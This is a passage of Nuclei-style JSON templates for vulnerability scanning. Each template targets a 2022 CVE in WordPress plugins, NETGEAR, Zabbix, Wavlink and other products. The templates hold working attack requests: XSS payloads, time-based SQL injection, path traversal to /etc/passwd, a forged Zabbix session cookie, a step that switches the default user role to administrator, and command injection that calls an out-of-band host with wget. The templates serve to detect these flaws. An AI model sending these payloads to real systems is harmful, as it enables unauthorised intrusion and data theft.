Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Tracking code not correct"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0952","info":{"name":"WordPress Sitemap by click5 <1.0.36 - Missing Authorization","severity":"high"},"requests":[{"raw":["POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"1\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"default_role\":\"administrator\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"0\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","status_code == 200","contains(body_1, 'users_can_register')","contains(body_2, 'default_role')"],"condition":"and"}]}]},{"id":"CVE-2022-0693","info":{"name":"WordPress Master Elements <=8.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Post Meta Setting Deleted Successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-0424","info":{"name":"Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npage=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"id\":\"","username\":\"","email\":","hash\":\"","_wpnonce"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29383","info":{"name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n","POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"User authentication Failed\")","contains(body_2, \"User Login Failed for SSLVPN User.\")"],"condition":"and"}]}]},{"id":"CVE-2022-25149","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 50s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-31974","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29349","info":{"name":"kkFileView 4.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"],"matchers-condition":"and","matchers":[{"type":"word","words":["txt\"><img src=111 onerror=alert(1)>123"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21661","info":{"name":"WordPress <5.8.3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ecsload&query={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"\"]}}}&ecs_ajax_settings={\"post_id\":\"1\", \"current_page\":1, \"widget_id\":1, \"theme_id\":1, \"max_num_pages\":10}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"WordPress database error:\")","contains(body, \"error in your SQL syntax\")"],"condition":"and"}]}]},{"id":"CVE-2022-2488","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0422","info":{"name":"WordPress White Label CMS <2.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php?wlcms-action=preview HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nwlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(/XSS/);"]},{"type":"word","part":"body","words":["wlcms-login-wrapper"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25481","info":{"name":"ThinkPHP 5.0.24 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?s=example"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","REQUEST_TIME","ThinkPHP Constants"],"condition":"and"},{"type":"status","status":[200,500,404],"condition":"or"}]}]},{"id":"CVE-2022-24900","info":{"name":"Piano LED Visualizer 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24856","info":{"name":"Flyte Console <0.52.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cors_proxy/https://oast.me/"],"matchers":[{"type":"word","words":["Interactsh Server"]}]}]},{"id":"CVE-2022-30073","info":{"name":"WBCE CMS 1.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<p><b><script>alert(document.cookie)</script>","WBCECMS"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"formtoken","group":1,"regex":["<input\\stype=\"hidden\"\\sname=\"formtoken\"\\svalue=\"([^\"]*)\"\\s/>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0218","info":{"name":"HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"background\":","\"footer\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0949","info":{"name":"WordPress Stop Bad Bots <6.930 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=0\n","@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))\n","GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"commentform\")"],"condition":"and"}]}]},{"id":"CVE-2022-29548","info":{"name":"WSO2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CARBON.showWarningDialog('???');alert(document.domain)//???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0769","info":{"name":"Users Ultra <= 3.1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"You have to be logged in to leave your rate\")"],"condition":"and"}]}]},{"id":"CVE-2022-22242","info":{"name":"Juniper Web Device Manager - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","The requested resource is not authorized to view"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0785","info":{"name":"WordPress Daily Prayer Time <2022.03.01 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"dptTimetable customStyles dptUserStyles\")"],"condition":"and"}]}]},{"id":"CVE-2022-43185","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-36642","info":{"name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd","{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["\"username\":","\"password\":","\"mustChangePwd\":","\"roleUser\":"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-23131","info":{"name":"Zabbix - SAML SSO Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/index_sso.php","{{BaseURL}}/index_sso.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(header), 'location: zabbix.php?action=dashboard.view')"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-31975","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2379","info":{"name":"WordPress Easy Student Results <=2.2.8 - Improper Authorization","severity":"high"},"requests":[{"raw":["GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"departments\":","batches\":"],"condition":"and"},{"type":"word","part":"body_2","words":["meta_data","\"name\":\"","\"registration_no\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0140","info":{"name":"WordPress Visual Form Builder <3.0.8 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin.php?page=vfb-export HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}/wp-admin/admin.php?page=vfb-export\nContent-Type: application/x-www-form-urlencoded\nOrigin: {{RootURL}}\n\nvfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Date Submitted\"","\"Entries ID\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0885","info":{"name":"Member Hero <=1.0.9 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-0660","info":{"name":"Microweber <1.2.11 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:comments\n\nclass=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,'QueryException')","contains(body_2,'SQLSTATE')","contains(body_2,'runQueryCallback')","contains(header_2,\"text/html\")","status_code_2==500"],"condition":"and"}]}]},{"id":"CVE-2022-44949","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0954","info":{"name":"Microweber <1.2.11 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/save_option HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\noption_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother\n","POST /module/ HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\nmodule=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,\"true\")","contains(body_3,'\\\"><img src=\\\"x\\\" onerror=\\\"alert(document.domain);\\\">\\\" placeholder=\\\"Use default')","contains(header_3,\"text/html\")","status_code_3==200"],"condition":"and"}]}]},{"id":"CVE-2022-40022","info":{"name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /controller/ping.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/controller/ping.php\n\ncurrentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+)"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-23944","info":{"name":"Apache ShenYu Admin Unauth Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"query success\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1020","info":{"name":"WordPress WooCommerce <3.1.2 - Arbitrary Function Call","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_key=a&perpose=update&callback=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-35405","info":{"name":"Zoho ManageEngine - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{RootURL}}/xmlrpc"],"body":"<?xml version=\"1.0\"?><methodCall><methodName>{{randstr}}</methodName><params><param><value>big0us</value></param></params></methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>faultString</name>"]},{"type":"word","part":"body","words":["No such service [{{randstr}}]","No such handler: {{randstr}}"],"condition":"or"},{"type":"word","part":"body","words":["<methodResponse>","</methodResponse>"],"condition":"or"}]}]},{"id":"CVE-2022-2544","info":{"name":"WordPress Ninja Job Board < 1.3.3 - Direct Request","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp/wp-content/uploads/wpjobboard/","{{BaseURL}}/wp-content/uploads/wpjobboard/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp/wp-content/uploads/wpjobboard","Index of /wp-content/uploads/wpjobboard"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40083","info":{"name":"Labstack Echo 4.8.0 - Open Redirect","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}//interactsh.com%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"location","regex":["^\\s*//interactsh.com/\\.\\."]},{"type":"status","status":[301]}]}]},{"id":"CVE-2022-3142","info":{"name":"NEX-Forms Plugin < 7.9.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 30s\nGET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code_2 == 200","contains(body_2, \"NEX-Forms\")","contains(content_type_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-39195","info":{"name":"LISTSERV 17 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31976","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_request HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-0381","info":{"name":"WordPress Embed Swagger <=1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/embed-swagger/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Embed Swagger","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["url: \"xss://\"-alert(document.domain)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25489","info":{"name":"Atom CMS v2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Path Array","console-debug"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25323","info":{"name":"ZEROF Web Server 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["back<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2022-2467","info":{"name":"Garage Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(7)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["Garage Billing Software"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2627","info":{"name":"WordPress Newspaper < 12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=\n"],"payloads":{"xss_payload":["--><form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<form><math><img onerror=alert(document.domain) src=1><mtext>","td-block-"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45354","info":{"name":"Download Monitor <= 4.7.60 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/download-monitor/v1/user_data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered\":","\"display_name\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44877","info":{"name":"CentOS Web Panel 7 